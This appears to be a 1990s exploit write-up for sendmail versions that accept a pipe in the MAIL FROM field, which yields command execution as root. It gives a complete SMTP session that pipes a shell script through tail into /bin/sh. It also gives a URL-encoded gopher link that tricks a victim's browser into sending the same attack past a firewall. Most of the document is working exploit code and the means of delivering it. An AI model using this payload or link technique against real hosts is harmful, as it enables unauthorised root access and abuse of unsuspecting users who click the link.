What:	Some versions of sendmail will allow 'MAIL FROM' to be a pipe.
Who:	??
When:	Found 1996, far older than that
Description:

Some versions of sendmail will allow 'MAIL FROM' to be a pipe, allowing
the user to execute commands as root (through the pipe).

A nice feature of this hack is that you can setup links that will cause
a browser to telnet as specified.  In other words, you can put up
a link that if someone with a bugged-version of sendmail clicks on, it
will run those commands.  This can get around firewalls, as long as the
person inside the firewall actually chooses that link!

This is an example of using a mailto or a gopherlink to trick someone
into getting root access by clicking on a web link.

First, here is how you would do it manually, telnetting to the sendmail
port (25):

--------------------------------------------------
MAIL FROM: |/usr/bin/tail|/bin/sh
RCPT TO: root
DATA
From: root@localhost
To: root@localhost
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen
Hi there. Wanna play ball?
#!/bin/sh
PATH=/bin:/usr/bin:/usr/ucb
export PATH
echo Running Netscape inside a firewall is a security hole. > /tmp/bug
id >> /tmp/bug
hostname >> /tmp/bug
ps -aux >> /tmp/bug
mail root@localhost < /tmp/bug
#9
#10
.
QUIT
--------------------------------------------------

Some explanation:  The MAIL FROM is a pipe through tail to /bin/sh.
Without any arguments, tail will print out the last ten lines of data.

This way we don't try to execute any of the mail headers in the shell.
That's what the lines "#9" and "#10" are for - they are just placeholders
to make sure that the last ten lines are only the script we want to
execute.  (Notice that the # symbol causes the line to be a shell comment)


As a URL:

--------------------------------------------------
gopher://localhost:25/0HELO%0AMAIL%20FROM%3A%20%7C%2Fusr%2Fbin%2Ftail%7C%2Fbin%2Fsh%0ARCPT%20TO%3A%20root%0ADATA%0AFrom%3A%20root%40localhost%0ATo%3A%20root%40localhost%0AReturn%2DReceipt%2DTo%3A%20%7Cfoobar%0ASubject%3A%20This%20is%20a%20large%20hole%20in%20the%20ground%2E%0AX%2DDisclaimer%3A%20We%20take%20no%20responsibility%20for%20what%20might%20happen%0A%0AHi%20there%2E%20Wanna%20play%20ball%3F%0A%0A%23%21%2Fbin%2Fsh%0APATH%3D%2Fbin%3A%2Fusr%2Fbin%3A%2Fusr%2Fucb%0Aexport%20PATH%0Aecho%20Running%20Netscape%20inside%20a%20firewall%20is%20a%20security%20hole%2E%20%3E%20%2Ftmp%2Fbug%0Aid%20%3E%3E%20%2Ftmp%2Fbug%0Ahostname%20%3E%3E%20%2Ftmp%2Fbug%0Aps%20%2Daux%20%3E%3E%20%2Ftmp%2Fbug%0Amail%20root%40localhost%20%3C%20%2Ftmp%2Fbug%0A%23%39%0A%23%31%30%0A%2E%0AQUIT%0A
--------------------------------------------------